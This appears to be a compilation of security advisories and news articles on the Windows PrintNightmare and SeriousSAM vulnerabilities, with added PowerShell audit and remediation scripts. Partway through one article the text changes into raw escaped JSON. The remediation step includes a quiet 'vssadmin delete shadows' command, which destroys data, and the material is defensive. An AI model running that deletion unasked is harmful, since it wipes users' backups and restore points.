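        Select-Object ID, InstallDate, VolumeName, DeviceObject
}

$exposed = @(Get-ExposedHives)
$shadows = @(Get-ShadowCopies)

if ($exposed.Count) { Write-Warning ('Live hives readable by BUILTIN\Users: ' + ($exposed -join ', ')) }
else                { Write-Host    'Live hive ACLs are restricted.' }
if ($shadows.Count) {
    Write-Warning ('{0} shadow copies present; any created before the ACL fix still expose the hives' -f $shadows.Count)
    $shadows | Format-Table -AutoSize | Out-String | Write-Host
}

if ($Remediate) {
    # KB5005357 step 1: restore inheritance so the hives take the parent
    # directory's administrator-only ACL instead of the permissive ACE.
    if ($PSCmdlet.ShouldProcess($configDir, 'icacls *.* /inheritance:e')) {
        & icacls.exe (Join-Path $configDir '*.*') /inheritance:e | Out-Null
    }
    # KB5005357 step 2: delete existing shadow copies. This also discards
    # System Restore points and VSS-based backups on the volume, so a fresh
    # restore point is created afterwards (client SKUs only; Checkpoint-Computer
    # is not supported on Windows Server).
    if ($PSCmdlet.ShouldProcess($env:SystemDrive, 'vssadmin delete shadows')) {
        & vssadmin.exe delete shadows "/for=$env:SystemDrive" /quiet | Out-Null
        Checkpoint-Computer -Description 'Post CVE-2021-36934 remediation' -RestorePointType MODIFY_SETTINGS -ErrorAction SilentlyContinue
    }
}
```

Run it without switches to audit; `-Remediate -WhatIf` prints what would change without touching anything. Because step 2 deletes every shadow copy on the system drive, confirm that no backup product depends on them before running it for real.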
### Windows Print Spooler Remote Code Execution Vulnerability (MSRC, CVE-2021-1675)

No description text was published in this entry. Published 2021-06-08; modified 2021-07-02. CVSS v3.1 base score 8.8 (HIGH), `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`; CVSS v2 base score 9.3 (HIGH), `AV:N/AC:M/Au:N/C:C/I:C/A:C`. CVEs: CVE-2021-1675, CVE-2021-34527. Source: <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675> (MS:CVE-2021-1675).

### Windows Print Spooler Remote Code Execution Vulnerability (MSRC, CVE-2021-34527)

A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

UPDATE July 7, 2021: The security updates for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.

In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (**Note**: these registry keys do not exist by default, and therefore are already at the secure setting), and that your Group Policy settings are correct (see FAQ):

* `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint`
* `NoWarningNoElevationOnInstall` = 0 (DWORD) or not defined (default setting)
* `UpdatePromptSettings` = 0 (DWORD) or not defined (default setting)

**Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.**

UPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also [KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates](<https://support.microsoft.com/topic/31b91c02-05bc-4ada-a7ea-183b129578a7>).

Note that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as “PrintNightmare”, documented in CVE-2021-34527.

Published 2021-07-01; modified 2023-06-13. CVSS v3.1 base score 8.8 (HIGH), `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`; CVSS v2 base score 9.3 (HIGH), `AV:N/AC:M/Au:N/C:C/I:C/A:C`. CVEs: CVE-2021-1675, CVE-2021-34527. Source: <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527> (MS:CVE-2021-34527).

### Windows Elevation of Privilege Vulnerability (MSRC, CVE-2021-36934)

An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

An attacker must have the ability to execute code on a victim system to exploit this vulnerability.

After installing this security update, you _must_ manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerability. **Simply installing this security update will not fully mitigate this vulnerability.** See [KB5005357 - Delete Volume Shadow Copies](<https://support.microsoft.com/topic/1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>).

Published 2021-07-20; modified 2021-08-12. CVSS v3.1 base score 7.8 (HIGH), `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`; CVSS v2 base score 4.6 (MEDIUM), `AV:L/AC:L/Au:N/C:P/I:P/A:P`. CVE: CVE-2021-36934. Source: <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36934> (MS:CVE-2021-36934).
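Microsoft's CVE-2021-34527 advisory above names the two Point and Print values that decide whether a patched host is still exploitable, and KB5005010 adds a third that stops non-administrators from installing drivers at all. The PowerShell below is an added example, not Microsoft's or Rapid7's code, that reads those values together with the spooler's state, the presence of the `spoolss` named pipe the MS-RPRN calls travel over, and the "Allow Print Spooler to accept client connections" policy (stored as `RegisterSpoolerRemoteRpcEndPoint`, where 2 means disabled), then optionally applies the restrictions or disables the service outright. It assumes an elevated Windows PowerShell 5.1 session on a host that already has the July 2021 or later cumulative update; the switch and function names are my own.

```powershell
# Added example; not code from AttackerKB, Microsoft or Rapid7. Reports the
# settings that decide whether a patched host is still exposed to
# CVE-2021-34527 (the Point and Print values from Microsoft's advisory, the
# KB5005010 driver-install restriction, and whether the spooler is reachable)
# and optionally applies the fixes. Assumes an elevated Windows PowerShell 5.1
# session on a host that already has the July 2021 or later cumulative update.
[CmdletBinding(SupportsShouldProcess)]
param(
    [switch]$Harden,          # write the Point and Print restrictions
    [switch]$DisableSpooler   # for hosts that never need to print (e.g. domain controllers)
)

$printersKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
$pnpKey      = Join-Path $printersKey 'PointAndPrint'

function Get-PolicyDword {
    # $null means the value (or its key) does not exist, which Microsoft
    # documents as the secure default for the Point and Print values.
    param([string]$Key, [string]$Name)
    try   { (Get-ItemProperty -Path $Key -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Get-SpoolerExposure {
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $running = [bool]($spooler -and $spooler.Status -eq 'Running')
    # The MS-RPRN endpoint the exploit talks to is the spoolss pipe over SMB;
    # it exists only while the service is running.
    $pipePresent = $false
    if ($running) {
        try { $pipePresent = [System.IO.Directory]::GetFiles('\\.\pipe\') -contains '\\.\pipe\spoolss' } catch {}
    }
    $noWarn   = Get-PolicyDword $pnpKey 'NoWarningNoElevationOnInstall'
    $noPrompt = Get-PolicyDword $pnpKey 'UpdatePromptSettings'
    $restrict = Get-PolicyDword $pnpKey 'RestrictDriverInstallationToAdministrators'
    $rpcEp    = Get-PolicyDword $printersKey 'RegisterSpoolerRemoteRpcEndPoint'
    [pscustomobject]@{
        SpoolerRunning                = $running
        SpoolssPipePresent            = $pipePresent
        NoWarningNoElevationOnInstall = $noWarn      # 1 = "vulnerable by design"
        UpdatePromptSettings          = $noPrompt    # non-zero = update prompts suppressed
        RestrictDriverInstallToAdmins = $restrict    # 1 = KB5005010 override in place
        RemoteRpcEndpointPolicy       = $rpcEp       # 2 = client connections disabled
        # With prompts suppressed, a low-privileged user can still push the
        # driver through a patched spooler; that is the bypass case.
        PatchBypassedByPointAndPrint  = [bool]($noWarn -eq 1 -or $noPrompt -gt 0)
    }
}

$state = Get-SpoolerExposure
$state | Format-List
if ($state.PatchBypassedByPointAndPrint -and $state.SpoolssPipePresent) {
    Write-Warning 'Spooler is reachable and Point and Print suppresses elevation: the patched binaries do not protect this host.'
}

if ($Harden -and $PSCmdlet.ShouldProcess($pnpKey, 'Apply Point and Print restrictions')) {
    New-Item -Path $pnpKey -Force | Out-Null
    Set-ItemProperty -Path $pnpKey -Name NoWarningNoElevationOnInstall -Type DWord -Value 0
    Set-ItemProperty -Path $pnpKey -Name UpdatePromptSettings          -Type DWord -Value 0
    # KB5005010: only administrators may install printer drivers at all.
    Set-ItemProperty -Path $pnpKey -Name RestrictDriverInstallationToAdministrators -Type DWord -Value 1
}

if ($DisableSpooler -and $PSCmdlet.ShouldProcess('Spooler', 'Stop and disable service')) {
    # The workaround CERT/CC and Microsoft gave for domain controllers and
    # systems that do not print; local and remote printing both stop.
    Stop-Service -Name Spooler -Force
    Set-Service  -Name Spooler -StartupType Disabled
}
```

The registry changes take effect without a reboot, as the AttackerKB assessment notes, so re-running the script immediately after `-Harden` should show the bypass flag cleared. `RestrictDriverInstallationToAdministrators` also breaks legitimate self-service driver installs, so roll it out through Group Policy with a driver-deployment plan rather than host by host.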
### Microsoft Releases Emergency Patch for PrintNightmare Bugs (Threatpost, 2021-07-07)

Microsoft has released an emergency patch for PrintNightmare, a set of two critical remote code-execution (RCE) vulnerabilities in the Windows Print Spooler service that hackers can use to take over an infected system. However, more fixes are necessary before all Windows systems affected by the bug are completely protected, according to the federal government.

Microsoft on Tuesday released an [out-of-band update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for several versions of Windows to address [CVE-2021-34527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527>), the second of two bugs that were initially thought to be one flaw and which have been dubbed PrintNightmare by security researchers.

However, the latest fix only appears to address the RCE variants of PrintNightmare, and not the local privilege escalation (LPE) variant, according to an [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare>) by the Cybersecurity and Infrastructure Security Agency (CISA), citing a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) published by the CERT Coordination Center (CERT/CC).

Moreover, the updates do not include Windows 10 version 1607, Windows Server 2012 or Windows Server 2016, which will be patched at a later date, according to CERT/CC.

#### A Tale of Two Vulnerabilities

The PrintNightmare saga [began last Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) when a proof-of-concept (PoC) exploit for the vulnerability – at that time tracked as CVE-2021-1675 – was dropped on GitHub showing how an attacker can exploit the vulnerability to take control of an affected system. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform.

The response to the situation soon turned into confusion. Though Microsoft released a [patch for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), addressing what it thought was a minor EoP vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.

However, it soon became clear to many experts that Microsoft’s initial patch didn’t fix the entire problem. CERT/CC on Thursday offered its own workaround for PrintNightmare, advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.

To further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called “Windows Print Spooler Remote Code Execution Vulnerability” that appeared to be the same vulnerability, but with a different CVE number – in this case, CVE-2021-34527.

“This vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),” the company wrote in the advisory at the time. “The attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.”

#### Microsoft Issues Incomplete Patch

The fix released this week addresses CVE-2021-34527, and includes protections for CVE-2021-1675, according to CISA, which is encouraging users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.

But as noted, it won’t fix all systems.

So, in cases where a system is not protected by the patch, Microsoft is offering several workarounds for PrintNightmare. One is very similar to the federal government’s solution from last week: to stop and disable the Print Spooler service – and thus the ability to print both locally and remotely – by using the following PowerShell commands: `Stop-Service -Name Spooler -Force` and `Set-Service -Name Spooler -StartupType Disabled`.

The second workaround is to disable inbound remote printing through Group Policy by disabling the “Allow Print Spooler to accept client connections” policy to block remote attacks, and then restarting the system. In this case, the system will no longer function as a print server, but local printing to a directly attached device will still be possible.

Another potential option to prevent remote exploitation of the bug that has worked in “limited testing” is to block both the RPC Endpoint Mapper (135/tcp) and SMB (139/tcp and 445/tcp) at the firewall level, according to CERT/CC. However, “blocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server,” the center advised.

Published 2021-07-07. CVEs: CVE-2021-1675, CVE-2021-34527. Aggregator CVSS 9.3, `AV:N/AC:M/Au:N/C:C/I:C/A:C`. Source: <https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/> (THREATPOST:6F7C157D4D3EB409080D90F02185E728).

### Microsoft: Unpatched Bug in Windows Print Spooler (Threatpost, 2021-07-16)

Microsoft has warned of yet another vulnerability that’s been discovered in its Windows Print Spooler that can allow attackers to elevate privilege to gain full user rights to a system. The advisory comes on the heels of patching two other remote code-execution (RCE) bugs found in the print service that collectively became known as PrintNightmare.

The company released [the advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) late Thursday for the latest bug, a Windows Print Spooler elevation-of-privilege vulnerability tracked as [CVE-2021-34481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34481>).
Microsoft credited Dragos vulnerability researcher Jacob Baines for identifying the issue.

The vulnerability “exists when the Windows Print Spooler service improperly performs privileged file operations,” according to Microsoft.

Attackers who successfully exploit the bug can run arbitrary code with SYSTEM privileges, allowing them to install programs, view, change or delete data, or create new accounts with full user rights, the company said.

To work around the bug, administrators and users should stop and disable the Print Spooler service, Microsoft said.

#### Slightly Less of a ‘PrintNightmare’

The vulnerability is the latest in a flurry of problems discovered in Windows Print Spooler, but seems slightly less dangerous, as it can only be exploited locally. It rates 7.8 out of 10 on the CVSS vulnerability-severity scale.

Indeed, [Baines told BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-guidance-on-new-windows-print-spooler-vulnerability/>) that while the bug is print driver-related, “the attack is not really related to PrintNightmare.” Baines plans to disclose more about the little-known vulnerability in [an upcoming presentation](<https://defcon.org/html/defcon-29/dc-29-speakers.html#baines>) at DEF CON in August.

The entire saga surrounding Windows Print Spooler [began Tuesday, June 30](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), when a proof-of-concept (PoC) for an initial vulnerability in the print service was dropped on GitHub showing how an attacker can exploit the flaw to take control of an affected system.

The response to the situation soon turned into confusion. Though Microsoft released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), fixing what it thought was a minor elevation-of-privilege vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.

However, soon after it became clear to many experts that Microsoft’s initial patch didn’t fix the entire problem. The federal government even stepped in last Thursday, when CERT/CC [offered its own mitigation](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) for PrintNightmare that Microsoft has since adopted – advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.

To further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called “Windows Print Spooler Remote Code Execution Vulnerability” that appeared to be the same vulnerability, but with a different CVE number – in this case, CVE-2021-34527. The company explained that the second bug was similar to the earlier PrintNightmare vulnerability but also its own distinct entity.

Eventually, Microsoft last Wednesday [released an emergency cumulative patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>) for both PrintNightmare bugs that included all previous patches and protections for CVE-2021-1675, as well as a new fix for CVE-2021-34527.

However, that fix also [was incomplete](<https://www.kb.cert.org/vuls/id/383432>), and Microsoft continues to work on further remediations as it also works to patch this latest bug, CVE-2021-34481. In the meantime, affected customers should install the most recent Microsoft updates as well as use the workaround to avoid exploitation, the company said.

Published 2021-07-16. CVEs: CVE-2021-1675, CVE-2021-34481, CVE-2021-34527. Aggregator CVSS 9.3, `AV:N/AC:M/Au:N/C:C/I:C/A:C`. Source: <https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/> (THREATPOST:A8242348917526090B7A1B23735D5C6C).

### CISA Offers New Mitigation for PrintNightmare Bug (Threatpost, 2021-07-02)

The U.S. government has stepped in to offer a mitigation for a critical remote code execution (RCE) vulnerability in the Windows Print Spooler service that may not have been fully patched by Microsoft’s initial effort to fix it.

To mitigate the bug, [dubbed PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), the CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for CVE-2021-1675 urging system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print, the Cybersecurity and Infrastructure Security Agency (CISA) said [in a release](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) Thursday.
CERT/CC is part of the Software Engineering Institute, a federally funded research center operated by Carnegie Mellon University.

“While Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) configured with the NoWarningNoElevationOnInstall option configured,” CERT/CC researchers wrote in the note.

The mitigation is in response to a scenario that unfolded earlier this week when a proof-of-concept (POC) for PrintNightmare was dropped on GitHub on Tuesday. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform. An attacker can use the POC to exploit the vulnerability to take control of an affected system.

In the meantime, Microsoft Thursday put out a new advisory of its own on PrintNightmare that assigns a new CVE and seems to suggest a new attack vector while attempting to clarify confusion that has arisen over it.

While the company originally addressed CVE-2021-1675 in [June’s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) as a minor elevation-of-privilege vulnerability, the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.

However, soon after it became clear to many experts that the patch appears to fail against the RCE aspect of the bug – hence CISA’s offer of another mitigation and Microsoft’s update.

#### Assignment of New CVE?

Regarding the latter, the company dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) Thursday for a bug called “Windows Print Spooler Remote Code Execution Vulnerability” that appears to be the same vulnerability, but with a different CVE number – in this case, CVE-2021-34527.

The description of the bug sounds like PrintNightmare; indeed, Microsoft acknowledges that it is “an evolving situation.”

“A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,” according to the notice. “An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

In a “FAQ” section in the security update, Microsoft attempts to explain CVE-2021-34527’s connection to CVE-2021-1675.

“Is this the vulnerability that has been referred to publicly as PrintNightmare? Yes, Microsoft has assigned CVE-2021-34527 to this vulnerability,” the company wrote.

However, the answer to the question “Is this vulnerability related to CVE-2021-1675?” suggests that CVE-2021-34527 is a different issue.

“This vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),” the company wrote. “The attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.”

Microsoft goes on to explain that CVE-2021-34527 existed before the June Patch Tuesday updates and that it affects domain controllers in “all versions of Windows.”

“We are still investigating whether all versions are exploitable,” the company wrote. “We will update this CVE when that information is evident.”

Microsoft did not assign a score to CVE-2021-34527, citing its ongoing investigation.

#### Two Vulnerabilities?

In retrospect, one security researcher noted to Threatpost when news of PrintNightmare surfaced Tuesday that it was “curious” that the CVE for the original vulnerability was “-1675,” observing that “most of the CVEs Microsoft patched in June are -31000 and higher.”

“This could be an indicator that they have known about this bug for some time, and fully addressing it is not trivial,” Dustin Childs of Trend Micro’s Zero Day Initiative told Threatpost at the time.

Now it appears that perhaps Microsoft was patching only part of a more complex vulnerability. The likely scenario appears to be that there are two bugs in Windows Print Spooler that could offer attackers some kind of exploit chain or be used separately to take over systems.

While one flaw may indeed have been addressed in June’s Patch Tuesday update, the other could be mitigated by CERT/CC’s workaround – or could remain to be patched by a future Microsoft update that comes after the company completes its investigation.

The company’s release Thursday of a new CVE related to PrintNightmare seems to be an initial attempt to clarify the situation, though given its developing nature, it remains a bit hazy for now.

Published 2021-07-02. CVEs: CVE-2021-1675, CVE-2021-30116, CVE-2021-34527. Aggregator CVSS 6.8, `AV:N/AC:M/Au:N/C:P/I:P/A:P`. Source: <https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/> (THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8).

### Threatpost coverage of CVE-2021-36958 (August 2021)

One day after dropping its scheduled August Patch Tuesday update, Microsoft issued a warning about yet another unpatched privilege escalation/remote code-execution (RCE) vulnerability in the Windows Print Spooler that can be filed under the [PrintNightmare umbrella](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>).

The news comes amid plenty of PrintNightmare exploitation. Researchers from CrowdStrike warned in a [Wednesday report](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) that the operators of the Magniber ransomware quickly weaponized CVE-2021-34527 to attack users in South Korea, with attacks dating back to at least July 13. And Cisco Talos [said Thursday](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) that the Vice Society gang was seen using CVE-2021-1675 and CVE-2021-34527 to spread laterally across a victim’s network as part of a recent ransomware attack.

“In technology, almost nothing ages gracefully,” Chris Clements, vice president of solutions architecture and Cerberus security officer at Cerberus Sentinel, told Threatpost. “The Print Spooler in Windows is proving that rule. It’s likely that the code has changed little in the past decades and likely still bears a striking resemblance to source code that was made public in previous Windows leaks.
I’ve heard it said that ransomware gangs might also be referred to as ‘technical debt collectors,’ which would be funnier if the people suffering most from these vulnerabilities weren’t Microsoft’s customers.”

The fresh zero-day bug, tracked as CVE-2021-36958, carries a CVSS vulnerability-severity scale rating of 7.3, meaning that it’s rated as “important.” Microsoft said that it allows for a local attack vector requiring user interaction, but that the attack complexity is low, with few privileges required.

“A remote code-execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,” the computing giant explained in its [Wednesday advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>). “An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.”

The CERT Coordination Center actually flagged the issue in mid-July, when it warned that a [working exploit](<https://twitter.com/gentilkiwi/status/1416429860566847490>) was available. That proof-of-concept (PoC), issued by Mimikatz creator Benjamin Delpy, comes complete with a video.

On Thursday, CERT/CC issued more details on the issue, explaining that it arises from an oversight in signature requirements around the “Point and Print” capability, which allows users without administrative privileges to install printer drivers that execute with SYSTEM privileges via the Print Spooler service.

While Microsoft requires that printer drivers installable via Point and Print are either signed by a WHQL release signature or by a trusted certificate, Windows printer drivers can specify queue-specific files that are associated with the use of the device, which leaves a loophole for malicious actors.

“For example, a shared printer can specify a CopyFiles directive for arbitrary files,” according to the CERT/CC [advisory](<https://www.kb.cert.org/vuls/id/131152>). “These files, which may be copied over alongside the digital-signature-enforced printer driver files, are not covered by any signature requirement. Furthermore, these files can be used to overwrite any of the signature-verified files that were placed on a system during printer driver install. This can allow for local privilege escalation to SYSTEM on a vulnerable system.”

Microsoft credited Victor Mata of FusionX at Accenture Security with originally reporting the issue, which Mata said occurred back in December 2020:

> Hey guys, I reported the vulnerability in Dec’20 but haven’t disclosed details at MSRC’s request. It looks like they acknowledged it today due to the recent events with print spooler.
>
> – Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)

So far, Microsoft hasn’t seen any attacks in the wild using the bug, but it noted that exploitation is “more likely.” With a working exploit in circulation, that seems a fair assessment.

#### Print Spooler-Palooza and the PrintNightmare

Delpy characterized this latest zero-day as being part of the string of Print Spooler bugs collectively known as PrintNightmare.

The bad dream started in late June, when a PoC exploit for a bug tracked as CVE-2021-1675 was [dropped on GitHub](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>). The flaw was originally addressed in [June’s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) from Microsoft as a minor elevation-of-privilege vulnerability, but the PoC showed that it’s actually a critical Windows security vulnerability that can be used for RCE. That prompted Microsoft to issue a different CVE number – in this case, CVE-2021-34527 – to designate the RCE variant, and it prompted [an emergency partial patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), too.

“This vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),” the company wrote in the advisory at the time. “The attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.”

Both bugs – which are really just variants of a single issue – are collectively known as PrintNightmare.
The PrintNightmare umbrella expanded a bit later in July, when yet another, [similar bug was disclosed](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>), tracked as CVE-2021-34481. It remained unpatched until it was finally addressed with [an update](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) issued alongside the [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) (which itself detailed three additional Print Spooler vulnerabilities, one critical).\n\n## **How to Protect Systems from Print Spooler Attacks**\n\nAs mentioned, there\u2019s no patch yet for the bug, but users can protect themselves by simply stopping and disabling the Print Spooler service:\n\n\n\nSource: Microsoft.\n\nCERT/CC also said that since public exploits for Print Spooler attacks use the SMB file-sharing service for remote connectivity to a malicious shared printer, blocking outbound connections to SMB resources would thwart some attacks by blocking malicious SMB printers that are hosted outside of the network.\n\n\u201cHowever, Microsoft indicates that printers can be shared via the Web Point-and-Print Protocol, which may allow installation of arbitrary printer drivers without relying on SMB traffic,\u201d according to CERT/CC. \u201cAlso, an attacker local to your network would be able to share a printer via SMB, which would be unaffected by any outbound SMB traffic rules.\u201d\n\nIn its update advisory for CVE-2021-34481, Microsoft also detailed how to amend the default Point and Print functionality, which prevents non-administrator users from installing or updating printer drivers remotely and which could help mitigate the latest zero-day.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. 
**[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T13:19:50", "type": "threatpost", "title": "Microsoft Warns: Another Unpatched PrintNightmare Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T13:19:50", "id": "THREATPOST:ADA9E95C8FD42722E783C74443148525", "href": "https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-22T20:05:59", "description": "A privilege escalation bug, affecting versions of Windows 10, received a workaround fix by Microsoft Wednesday to prevent attackers from accessing data and creating new accounts on compromised systems.\n\nThe bug, dubbed SeriousSAM, affects the Security Accounts Manager (SAM) database in all versions of Windows 10. The SAM component in Windows houses user account credentials and network domain information \u2013 a juicy target for attackers. A prerequisite for abuse of the bug is that an adversary needs either remote or local access to the vulnerable Windows 10 system.\n\nTracked as CVE-2021-36934, Microsoft said the vulnerability exists because of overly permissive Access Control Lists on multiple system files, including the (SAM) database. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d the [Microsoft bulletin explains](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). 